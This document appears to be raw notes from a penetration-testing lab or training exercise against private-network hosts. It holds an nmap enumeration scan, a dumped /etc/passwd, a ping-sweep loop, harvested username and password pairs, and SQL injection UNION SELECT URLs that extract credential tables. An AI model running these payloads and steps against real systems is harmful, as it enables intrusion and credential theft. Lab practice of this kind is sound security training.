nmap --script=http-enum 10.50.14.25

Nmap scan report for 10.50.14.25
PORT   STATE    SERVICE
22/tcp open     ssh
53/tcp filtered domain
80/tcp open     http
| http-enum: 
|_  /share/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
ip found - 192.168.28.0/27
           192.168.28.160/27
            FFcy67MnQaE33rt8JNm1

 www-data:x:33:33:KoB6IGKyRRPyn9FdWJTp:/var/www:/bin/sh


root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:KoB6IGKyRRPyn9FdWJTp:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin syslog:x:102:106::/home/syslog:/usr/sbin/nologin messagebus:x:103:107::/nonexistent:/usr/sbin/nologin _apt:x:104:65534::/nonexistent:/usr/sbin/nologin lxd:x:105:65534::/var/lib/lxd/:/bin/false uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin sshd:x:109:65534::/run/sshd:/usr/sbin/nologin pollinate:x:110:1::/var/cache/pollinate:/bin/false ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash openupthedoor:x:1001:1001::/home/openupthedoor:/bin/bash

for i in {1..255}; do (ping -c 1 192.168.28.$i | grep "bytes from" &); done

192.168.28.161

192.168.28.177 - 22

192.168.28.182 - 22,80 - Defense_KP
  |   /login/: Login page
      Array
(
    [0] => Msmith
    [name] => Msmith
    [1] => Squanchy
    [password] => Squanchy
)
1Array
(
    [0] => Fpalic *************************************
    [name] => Fpalic
    [1] => Birdperson
    [password] => Birdperson
)
1Array
(
    [0] => Kmichae
    [name] => Kmichae
    [1] => MrMeeseeks
    [password] => MrMeeseeks
)
1

|   /robots.txt: Robots file


http://127.0.0.1:1112/forces/forcespick.php?Locations=4 UNION SELECT user_id,user,name,password from auth_users.logins

http://127.0.0.1:1112/forces/forcespick.php?Locations=4 UNION SELECT id,unit,auth_str,on_hand from forces.units

